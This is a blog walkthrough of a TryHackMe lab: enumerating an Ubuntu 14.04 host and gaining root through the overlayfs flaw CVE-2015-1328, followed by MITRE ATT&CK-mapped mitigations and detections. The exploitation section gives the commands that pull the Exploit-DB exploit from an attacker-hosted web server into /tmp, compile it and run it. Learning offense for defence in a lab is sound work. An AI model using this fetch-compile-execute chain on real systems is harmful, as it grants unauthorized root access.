Escalate and Defend: Linux Kernel Exploit Walkthrough

Welcome back to Notes By Nisha! In this walkthrough, we’ll explore the Kernel Exploits section of the Linux Privilege Escalation room on TryHackMe.

I’ll walk you through the steps I took to escalate privileges on the target machine, and as a Blue Teamer at heart, I’ll follow up with defensive strategies mapped to the MITRE ATT&CK Framework.

· Task 1 — Introduction
· Task 2 — What is Privilege Escalation?
· Task 3 — Enumeration
· Vulnerability Overview
· Task 4 — Automated Enumeration Tools
· Task 5 — Privilege Escalation: Kernel Exploits
· Kernel Exploit Methodology
· Exploitation Steps
· Switching to Defense: How Can We Stop This?
· MITRE ATT&CK Mapping
· 🛡️ Mitigations
· 🔍 Detection Opportunities
· 🛡️ Hardening Recommendations
· References
· Key Takeaways
· Conclusion

Task 1 — Introduction

This TryHackMe room covers privilege escalation techniques on Linux systems. In this activity, we focus on exploiting a kernel vulnerability to gain root access.

• No answer needed

Task 2 — What is Privilege Escalation?

Privilege escalation occurs when an attacker exploits a flaw to elevate their access rights. On Linux systems, this often means escalating from a standard user to root, gaining complete control over the system.

• No answer needed

Task 3 — Enumeration

Enumeration is a critical step in identifying potential privilege escalation paths. Here’s how I approached it on the target machine.

Q: What is the hostname of the target system?

hostname

Answer: wade7363

Q: What is the Linux kernel version of the target system?

uname -r

Answer: 3.13.0–24-generic

Q: What Linux is this?

cat /etc/os-release

Answer: Ubuntu 14.04 LTS

Q: What version of the Python language is installed on the system?

python --version

Answer: 2.7.6

Q: What vulnerability seems to affect the kernel of the target system? (Enter a CVE number)

Using the kernel version we discovered, I performed a Google search:

This led me to CVE-2015–1328, a vulnerability in overlayfs that allows privilege escalation.

Exploit-DB: CVE-2015–1328

A: CVE-2015–1328

Vulnerability Overview

This vulnerability exists in the overlayfs filesystem implementation in affected versions of the Linux kernel. Attackers can mount overlay filesystems in restricted locations and override files to escalate privileges.

CVE-2015–1328 Vulnerability Overview

• Vulnerability Name: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) — ‘overlayfs’ Local Privilege Escalation
• CVE ID: CVE-2015–1328
• Exploit Type: Local Privilege Escalation

Affected Systems

• Ubuntu 12.04, 14.04, 14.10, 15.04
• Linux Kernel versions 3.13.0 through 3.19

Impact

Successful exploitation grants an attacker full root access, allowing them to:

• Run arbitrary code
• Install rootkits
• Access and modify sensitive data
• Disable security controls

Discovery and Patch: Reported by Philip Pettersson. Fixed in Kernel versions 3.19 and later.

Reference: CVE-2015–1328 Details

Task 4 — Automated Enumeration Tools

Automated enumeration tools are essential when auditing a Linux system for privilege escalation opportunities. These tools speed up the process by identifying kernel versions, misconfigurations, weak permissions, and potential exploits.

Here are some commonly used tools:

• LinPEAS
• LinEnum
• LES (Linux Exploit Suggester)
• Linux Smart Enumeration
• Linux Priv Checker

Task 5 — Privilege Escalation: Kernel Exploits

The goal of privilege escalation is to gain root-level access to the target system. This is often achieved by exploiting known vulnerabilities or misconfigurations that allow a user to increase their privileges.

On Linux systems, the kernel controls communication between hardware and software. Because of its critical role, the kernel runs with high privileges. Successfully exploiting a kernel vulnerability can result in full root access.

Kernel Exploit Methodology

Exploiting kernel vulnerabilities generally involves three simple steps:

1. Identify the kernel version on the target.
2. Search for known exploits.
3. Execute the exploit to escalate privileges.

**Note**: Kernel exploits can be unstable. Failed attempts may crash the system (kernel panic). Always consider the risks before running them in live environments. Lab and CTF scenarios are great for safe practice.

Researching Kernel Exploits

Once you know the kernel version, begin your research:

- Use Google to search for known exploits (e.g., `3.13.0–24-generic exploit`).

- Check vulnerability databases like [CVE Details](https://www.cvedetails.com/).

- Use automated tools such as LES (Linux Exploit Suggester). Be aware of potential false positives or false negatives in their reports.

Important Reminders Before Running Exploits

- Be specific — but not overly narrow — when searching for exploits.

- Understand how the exploit works before running it. Some can destabilize or weaken the system, which is unacceptable in a real penetration test.

- Some exploits require manual interaction after execution. Always read the instructions and comments provided by the exploit author.

- To transfer exploit code from your machine to the target, use Python’s `SimpleHTTPServer` (or `http.server` in Python 3) and download it with `wget`.

Exploitation Steps

In this exercise, I followed this methodology to identify and exploit CVE-2015–1328 on the target’s vulnerable kernel. Below are the exact steps I took, along with screenshots.

Download and Prepare the Exploit

I downloaded the exploit code to my Kali attack VM using the wget command below.

For better organization, I renamed the file with a .c extension and moved it to my transfers directory. This step is optional, but I like to keep my files organized by function.

wget https://www.exploit-db.com/exploits/37292

sudo mv 37292 /home/nisha/transfers/37292.c

Host Web Server for File Transfer

Next, I hosted a Python web server on port 8080 from my Kali VM to serve the exploit to the target machine:

python3 -m http.server 8080

Verify Kali IP Address

First, I verified my Kali VM’s IP address using the `ifconfig` command. My IP was `10.2.119.123`.

ifconfig

Transfer Exploit to Target and Execute

On the target VM, I navigated to the /tmp directory since it is typically world-writable. Then, I downloaded the exploit from my Kali machine’s Python web server:

cd /tmp
wget http://10.2.119.123:8080/37292.c
chmod +x 37292.c

I then compiled the downloaded .c file using gcc and created an executable binary:

gcc 37292.c -o 37292

Finally, I ran the exploit:

./37292

Verify Root Access

whoami
id

Capture the Flag

While still in /tmp, I navigated to the /home directory and listed its contents. I noticed a home directory for matt. Inside that folder, I found the flag1.txt file and viewed its contents:

cd /home/matt
ls
cat flag1.txt

I could have used a find command to save a few extra keystrokes, but the mission is accomplished, nonetheless!!

find / -name "flag1.txt" 2>/dev/null

Switching to Defense: How Can We Stop This?

After gaining root access through a kernel exploit, defenders need to understand how to prevent, detect, and mitigate these attacks. We’ll break it down using the MITRE ATT&CK Framework.

MITRE ATT&CK Mapping

• Tactic: Privilege Escalation
• Technique: Exploitation for Privilege Escalation
• Technique ID: T1068
• Description: Exploiting a software vulnerability to escalate privileges, specifically targeting a kernel flaw (CVE-2015–1328).

🛡️ Mitigations

🔧 Patch Management (M1051)

Regularly apply kernel updates and patches. This prevents attackers from exploiting known vulnerabilities, such as CVE-2015–1328, often used in privilege escalation attacks.

🚫 Execution Prevention (M1038)

Enforce SELinux or AppArmor policies to block unauthorized code execution.
For example:

• Prevent code execution in common temp directories like /tmp, /dev/shm, and /var/tmp.
• Restrict which binaries and scripts can run in sensitive areas of the filesystem.

📝 Audit and Monitor Process Execution (M1047)

Continuously log and monitor system activity to detect unusual behavior.
Recommendations:

• Monitor processes being compiled or executed from /tmp.
• Generate alerts for suspicious binaries or privilege escalation attempts.

👤 Privileged Account Management (M1018)

Follow the principle of least privilege:

• Limit admin access to essential users only.
• Regularly audit user permissions.
• Use strong authentication and authorization mechanisms to protect privileged accounts.

🔍 Detection Opportunities

A layered detection strategy is essential for defending against privilege escalation and post-exploitation activities. Both SIEM and Endpoint Detection & Response (EDR) platforms can play a major role in identifying suspicious behavior.

⚙️ Process Monitoring

• Detect unauthorized use of gcc or other compilers by non-admin users.
• EDR tools can alert on or block unauthorized compilation activity.

Tip: Flag compilation processes in unusual locations or owned by unexpected users.

🗂️ File Monitoring

• Monitor for file creation or execution in risky directories such as /tmp, /dev/shm, and /var/tmp.
• EDR solutions can enforce execution policies to prevent running binaries from these locations.

🌐 Unusual Network Activity

• Detect suspicious downloads using wget or curl, particularly on non-development servers.
• SIEM and EDR tools can be configured to alert on unexpected outbound network activity.

🚀 Privilege Escalation Events

• Track sudden privilege escalation, such as users gaining root access.
• EDR platforms can detect, alert, and even isolate compromised endpoints when such events occur.

🧰 Kernel Module Monitoring

• Monitor the loading of new kernel modules, as this could indicate rootkit deployment or other malicious behavior.
• Both SIEM and EDR solutions can log and alert on suspicious kernel-level activity.

🛡️ Hardening Recommendations

A solid hardening strategy can significantly reduce the risk of privilege escalation and exploitation on Linux systems.

🔧 Keep Systems Patched

• Regularly update the Linux kernel and all installed software.
• Subscribe to distro-specific security mailing lists (e.g., Ubuntu Security Announce, Red Hat Security Advisories).
• Apply critical patches as soon as they are released to protect against known vulnerabilities.

🚫 Restrict Compiler Access

• Remove gcc (and other compilers) from non-development systems.
• If compilation is necessary, restrict access to administrative users only.
• Monitor for unexpected compiler usage, which may indicate an attacker trying to build an exploit.

🔐 Implement Mandatory Access Controls (MAC)

• Use SELinux or AppArmor to:
• Limit user and process permissions.
• Enforce security policies that restrict potentially dangerous operations.
• Ensure MAC policies are properly configured and actively enforced.

🗂️ Secure Temporary Directories

• Mount temporary directories such as:
• /tmp
• /var/tmp
• /dev/shm
• With the following options:
• noexec → prevents execution of binaries.
• nodev → disallows the use of device files.
• nosuid → blocks SUID/SGID binaries from executing.

Example /etc/fstab entry:
tmpfs /tmp tmpfs defaults,noexec,nosuid,nodev 0 0

References

• T1068 — Exploitation for Privilege Escalation
• M1051 — Update Software
• M1038 — Execution Prevention
• M1047 — Audit
• M1018 — User Account Management

Key Takeaways

• Privilege escalation exploits thrive on unpatched systems and misconfigurations.
• Combine patch management, process monitoring, EDR, and Splunk to create a robust defense strategy.
• Understanding the offensive side improves defensive posture and mitigation strategies.

Conclusion

This walkthrough demonstrated an offensive exploitation of CVE-2015–1328 and defensive strategies mapped to the MITRE ATT&CK Framework.

➡️ If you found this guide helpful, follow me for more offensive and defensive cybersecurity content!
➡️ Stay sharp!

- Notes By Nisha